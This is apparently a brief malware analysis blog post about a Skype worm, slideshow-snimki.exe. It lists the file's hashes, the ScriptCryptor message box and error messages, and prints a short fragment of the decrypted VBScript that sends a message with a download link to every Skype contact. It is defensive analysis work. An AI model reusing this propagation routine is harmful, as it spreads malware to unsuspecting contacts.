Skype Worm | Joachim De Zutter
File contains:

Filename: slideshow-snimki.exe
Filesize: 185856
MD5: 998c035292b34fe07200202adfa56efe
SHA1: f86b2a68d7808b98f9795dd93302807b2e43e558
SHA256: d7527fdde8c7d2a4c41b5225844920b5f88e8900dea4fb2e6d3fafdc210ceb0b

The application starts with a message box saying:

"This application created with Unregistered version of ScriptCryptor.
Please register your copy to remove this window.
Visit for more info."

The malware opens the registry keys associated with the Skype4COM API:


If the keys couldn't be found, an error message is displayed:

Error: Invalid class string
Line: 1
Position: 1"

After installing the Skype client without setting up a user account, another error message is displayed:

Error: Not attached.
Line: 3
Position: 1"

Part of the decrypted script looks as follows in memory:
set yADAl = Wscript.CreateObject("Skype4COM.Skype", "Skype_")
For Each GAG In yADAl.Friends 
yADAl.SendMessage GAG.handle, <msg>
Where <msg> contains a URL that points to the download location of the worm.

The worm doesn't appear to do more than to spread itself and its message.